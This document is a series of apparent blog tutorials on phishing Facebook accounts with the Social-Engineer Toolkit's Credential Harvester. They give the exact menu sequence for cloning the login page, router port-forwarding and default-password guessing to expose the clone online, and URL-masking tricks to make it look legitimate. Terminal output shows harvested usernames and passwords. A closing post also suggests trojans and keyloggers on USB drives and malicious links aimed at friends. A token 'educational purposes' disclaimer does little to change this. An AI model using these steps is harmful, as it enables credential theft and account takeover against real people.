Credential Harvestor : Port Forwarding : Phishing Facebook

In the previous tutorial, we created a fake login page for facebook using Credential harevester. This however, would work only over Local Area network. Today we will enable port forwarding on our router and use our external IP address to create a phishing page that will work over the internet. The picture gives a good idea what port forwarding does. In the previous case, out page was only visible to computers on the right side of the firewall, i.e. those within the local network. The firewall handles traffic which comes through public address and decides whether to forward it to the internal network or block it. The port forwarding feature of the router tells it to allow traffic through a certain port.

Pre-requisites

1. Must know how to use SET and Credential Harvester over local area network. If not read the tutorial on Credential Harvester (same as the link above).
2. Kali Linux or backtrack 5 (other Linux distributions will work if you can install SET and all the dependencies)
3. Patience - Finding your router password might be hard sometimes.
4. Some basic knowledge (read a few old posts on this blog which I had written assuming that newbies were the ones reading. By now, after following dozens of my post, the readership has grown smart and doesn't need to be spoon fed.

Find you public IP

Go to google and search what is my IP. Under normal circumstances you wouldn't even have to click on any of the results, as google will find your IP for you. If not, then one of the top results sure will.

I removed the address. But it will show up in your case.

Finding your router IP and logging in

Most of the times the IP is 192.168.1.1 or a slight variation, but do an ifconfig to find out. Now enter the IP on your browser, and you'll see a login prompt. Here is something that usually works-

• Username : admin
• Password : password, admin or in some cases, leave the password field blank

If none of the above combos work, try this http://www.routerpasswords.com/ or http://lmgtfy.com/?q=default+router+password

This is the step where I can't help much. You need to see what your router is and then find out the login details. Most of the times it is left to default. You can also do a wordlist attack with common router login credentials (help yourself, I am not going to write a thesis on this, because many people have already done that, and you need to learn some google-fu). Now after getting access to your router, come back to Se-toolkit

Social Engineering Toolkit : Credential harvestor

Here is the set of commands that you will need. If you need the details check the previous post.

se-toolkit

1 (enter)

2 (enter)

3 (enter)

2 (enter)

Enter your public IP (first step remember)

Enter the site you want to clone (The method works equally well with Facebook, Gmail, Twitter or whatever. None of the steps will be different at all for any website).

Now just let the terminal be and come back to your router.

The routers are all different : Port Forwarding

Now here is another tough part of this tutorial. While the thing that needs to be done is same for all routers, the procedure is not. You see, the user-router interaction interface is different for all routers. The thing you have to know is-

This is what my router looks like

• Terms to look for - NAT, port forwarding, virtual servers (the router can refer to port forwarding by using any of these terms). If you find something like this, click on it. Also, many a times the routers interface is quite complicated and advanced, with seperate fields for WAN, LAN, access control, etc. You'll have to take a look around and see where you can find anything related to port forwarding. When you do, you can move to the step below.
• Stuff to enter-

1. Application name - Most routers ask you to give a name to the port forwarding setup. Many also have a drop down menu containing most common reasons why people perform port forwarding (the drop down menu mostly has multiplayer games and stuff, don't expect SET there). This field is insignificant, enter whatever you want to. Maybe SET.
2. Port / First Port / Last Port - Some routers just ask you which port to forward, some ask you to enter a range. Nevertheless, you will enter either 80 as the only port, or 80 to 80 as the range. Any field which asks for anything related to port, and 80 is what you'll enter.
3. Protocol (or some other name) - It will have options TCP, UDP, both (both may be replaced by all or TCP and UDP or something). Choose both or whatever corresponds to both in your router.
4. IP address (sometimes not) - Here you enter your local IP. 192.168.1.xxx or something. Not your public IP.

Save and you are good to go. If you have any field that you're not sure about, mention it in the comments. It will help you as well as other users who have the same difficulty. And here's how I set it up, look at the screenshot and look for relevant fields in your router.

Go ahead

Now open any browser and enter you IP. You will see your fake Facebook login page there. Also, try and enter something in the fields. It will show up on the Se-toolkit terminal. The screenshot on the right shows what it looks like on my browser (Somehow se-toolkit decided to clone the Hindi version of the website. I don't have any memory of ever using Facebook in Hindi though).

After I entered data in the fields and pressing the login button, the following showed up on my se-toolkit window.

Make it look real-

Now there are very few who will enter their login details to a website whose name is not even a name, but a set of numbers seperated by dots. You can use bit.ly or goo.gl to for that. However, they don't mask the url, and as soon as the user reaches the destination, he will see the original URL. I would have recommended dot tk, but they don't support IP addresses. In this case, you can use no-ip, which will solve a lot of problems-

1. You'll get a static IP
2. You'll get a comparitively less suspicious domain name
3. You will be safer. This is because sharing your public IP address on the internet isn't a good idea. And with a port open, people (by people I mean professional hacker who know what they are doing) might break into your system. (If you noticed I never mentioned my public IP anywhere in the post, nor posted any screenshot with it. All the visitors to my site are hackers, and some are better than me, so I'm not inviting trouble here).

Alternatively, you can take a look here at http://www.pc-help.org/obscure.htm. This page deals with the art of modifying your URL to fool others. In our case, we will use it to make our IP address look like a  legitimate  website. The only problem is some of the stuff is not browser independent and would work only on a few browsers (each browser deals with a URL differently).

Read full post »

Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook

Hacking Facebook

In the previous post I've discussed how not to hack Facebook. Here we will discuss how to hack Facebook. This tutorial is meant for enhancing you networking skills, as well as to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks. Don't use this information to hack someone's account, or you'll run the risk of getting into legal troubles. If you haven't yet read the previous post, you should. It might not be very enlightening in terms of technical details, but it quite enjoyable and will provide you with a background of what we are looking at.

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That'll be me)

If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux

I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial. Better yet, I'll link it here- Kali Linux : What it is and how to install

Se-toolkit

Start Kali Linux. In a console/terminal type se-toolkit.

Something like this will show up

root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |
                 /        \ |        \  |    |
                /_______  //_______  /  |____|
                        \/         \/          
  [---]        The Social-Engineer Toolkit (SET)         [---]      
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]                 Version: 4.3.9                   [---]
  [---]              Codename: 'Turbulence'              [---]
  [---]         Follow us on Twitter: @trustedsec        [---]
  [---]         Follow me on Twitter: @dave_rel1k        [---]
  [---]       Homepage: https://www.trustedsec.com       [---]
     Welcome to the Social-Engineer Toolkit (SET). The one
      stop shop for all of your social-engineering needs.
 
      Join us on irc.freenode.net in channel #setoolkit
  The Social-Engineer Toolkit is a product of TrustedSec.
           Visit: https://www.trustedsec.com
 Select from the menu:
   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
set> 

Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

• 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
• The 2 selects Website Attack Vectors. Not that obvious.  The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
• Then, the 3 selects Credential Harvestor.  The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Now you'll be seeing something like this-

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.
 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP

On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for

Back to se-toolkit

 Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did.

The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvestor works.

On the Kali Linux Machine itself

Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -

Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-

POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password

Also note that se-toolkit might keeping dumping more stuff in the console, most of which is not important for the time being.

On Windows 8 machine (host)

Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. Also, we would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.

I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to facebook.

POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Conclusion : This method pretty much works well over LAN.

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense. Next tutorial will help you make your fake login page accessible over the internet. [Coming Soon] There you go -  http://www.kalitutorials.net/2014/05/credential-harvestor-port-forwarding.html

Read full post »

Hack Facebook Account : Stuff You Should Know

Hack Facebook?

Okay, so you got lured into the idea of hacking a Facebook account? I won't ask why. Everyone has their reasons. If you came here to learn how to hack a Facebook account, feel free to leave, because the title read - Hack Facebook Account : Stuff You Should Know - and not - How to hack a facebook account (well actually don't leave, I have something for you later in this tutorial, something on actually hacking Facebook) .That being said, there are a lot of real hacking tutorials around the website you might want to read. However, if you are here on a pure curiosity basis, then read on, and you will be a smarter person by the end of this post than you were when you began reading it.

Why not to think about hacking facebook

Search google images for facebook hack and you already
 see so many misleading programs. I mean
just enter user ID and they'll provide
 you with username and password.
It's surprising how many people actually expect it to work.

First, because you can't. Well, actually you can, but the high improbability of success makes it stand next toyou can't hack facebook. If you think typing 'hack facebook account' on google, clicking on the first result, and entering the target's email address will give you the password of his/her Facebook account, then you are not on the general level of stupidity, you have achieved an appreciatively high one. Come on, if it were so easy to hack a FB account no one would be using FB to start with. There is so much on our Facebook account that we can't even imagine the consequences if it were to get into the hands of a seasoned hacker, leave alone a novice (not even a novice for that matter) who just searched google for hacking facebook.
impossible, so much so, that I won't be exaggerating in saying that it can't be hacked. As far as the picture on the left is concerned, its one of the many tools offered on the internet, all of which have the following in common-

1. All have very easy user interface. You just have to enter the user id, and click hack.
2. All have download links which will take you to a survey, or some annoying ads.
3. All are 100% not working.

What does 'hacking Facebook' actually mean?

What is the actual meaning of hacking Facebook. Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone's password, but hacking is so much more. Account passwords to hacking are just like coins are to the subway surfer game. You get coins along the way, your progress is partially judged on the basis of coins acquired, but the idea is to find your way through the obstacles and keep moving ahead. In general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, language on which it is built on, etc. Then you find vulnerabilities in the working of the websites, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. Another step might be to clear your traces so that you don't get caught. And trust me, you can't do this. I mean you wouldn't be reading a blog on beginner level hacking on Kali Linux if you had so far with web pentesting. So, the conclusion is that hacking Facebook is a real big deal, not everyone's piece of cake (I admit even I'm nowhere close to the level of expertise where I would be playing with databases on Facebook servers). And the Facebook passwords are just a reward that you get after hacking Facebook. But are we missing something? There can't be only one way to get someone's facebook password. I mean we don't want administrator access to all the Facebook databases, just a password of one of the millions of users. There must be a hole somewhere. That kid next door claims he can get Facebook password of anyone, and he's good, but not 'code a exploit for Facebook' good, no, not that good. This is where social engineering steps in.

Social Engineering

With time, the level of security in all fields of life keeps getting stronger. The element of encryption has reached almost unbeatable stage. With 256 bit encryption, cracking will take practically forever. The element of laziness is in our favor (not everyone upgrades to latest security measures), and so is the element of cost-effectiveness and carelessness (you don't picture a nerd kid with glasses next door when you are deciding between WEP and WPA for your password). But nevertheless, things are changing, but one thing remains constant. Humans. Humans in general are stupid. Not really, a better word would be ignorant, not aware of how stuff works. Most Facebook users have no idea about what all Facebook is doing for their accounts security, and how easily their carelessness can ruin each and every one of Facebook's effort to protect their private information.

Humans are the weakest link in any security system

From leaving one's account logged in to not paying attention to someone who's peeping from behind, watching them type their passwords, humans can be really ignorant. But we need not rely on this level of ignorance for passwords (I stopped using the word stupid because it'll definitely annoy and offend people. I mean not good at computers doesn't really mean stupid. They have other stuff to do than protect their accounts). We can very well get the password of an average internet user who is not very paranoid and cynical about stuff. We can't hack Facebook and gain access to their servers, but your friends machine isn't that well guarded. A virus binded with a game he asked you to fetch in a USB drive? An average person won't think that you might have planted a trojan or a keylogger in the USB drive when he takes a file from you. Or maybe send him a link which will silently install some malware in his computer. Many people don't think twice before clicking on a link (some people do, though). Or maybe make a fake login page and send him a professional looking email, directing him to a website where he ends up receiving a login page somehow (you have to make it look real and genuine, backed up by a nice story, that you can expect the target to buy). There are many more methods. As far as the promise for something later in this tutorial about actual Facebook hacking, I have provided you with a small trailer about what you can do, in the next few tutorials we will discuss stuff in detail. The first tutorial is here.

Credential Harvester To Hack Facebook (Phishing)

I don't usually put this disclaimer, but as it was a tutorial that could potentially lead a lot of people on the wrong track (away from the quest on knowledge and towards the quest for illegal hacking and account passwords), here is a warning. Everything on this site is for educational purposes and I won't be responsible for anything you do with this information. If you do something illegal, the jail time would be yours to serve, not mine. So be careful where you are headed.

Read full post »